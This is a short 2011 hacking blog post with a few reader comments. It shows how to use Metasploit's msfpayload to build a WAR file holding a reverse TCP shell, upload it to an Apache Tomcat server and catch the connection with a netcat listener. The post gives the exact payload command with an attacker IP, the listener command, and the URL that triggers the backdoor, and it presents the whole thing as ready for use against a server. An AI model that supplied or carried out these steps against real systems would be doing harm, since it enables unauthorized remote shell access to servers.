2011
05.06

Create a WAR backdoor with Metasploit

Category: Hacking, Research, Web Hacking / Tag:  / Add Comment

Facing a tomcat server.. and need to upload a WAR backdoor…??, well… we can create a WAR backdoor very easily with Metasploit, ok follow this steps:

1. Creating the backdoor.

dudul@banget:~$ msfpayload linux/x86/shell_reverse_tcp LHOST=172.16.96.1 W > dudul.war
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: {“LHOST”=>”172.16.96.1″}

it will create a WAR file contain a random name for jsp backdoor file

2. Upload the WAR file.

 

 

3. Use netcat to listen for the reverse shell connection.

dudul@banget:~$ nc.traditional -lvp 4444
listening on [any] 4444 …

4. Access the backdoor with the web browser.

http://172.16.96.140:8080/dudul/spwigfeikmv.jsp

msf create a random jsp file, so… make sure to access the right jsp file

5. Boom… we got a reverse shell connection. :D

Related Post

4 comments so far

Add Your Comment
  1. avatar
    Reply
    modpr0be said: 2011.05.07 11:25

    niceeeeeee!!

  2. avatar
    Reply
    DNA said: 2011.05.07 12:38

    nice tuts bg.
    :two thumbs up:

  3. avatar
    Reply
    anonymous said: 2011.06.07 14:37

    “dudul” detected…..

  4. avatar
    Reply
    Coresec.org – Information Security Blog » Hacking Tomcat using Metasploit’s WAR payloads said: 2011.10.08 20:06

    [...] http://www.digital-echidna.org/2011/05/create-a-war-backdoor-with-metasploit/ VN:F [1.9.11_1134]please wait…Rating: 0.0/5 (0 votes cast)VN:F [1.9.11_1134]Rating: 0 (from 0 [...]

Your Comment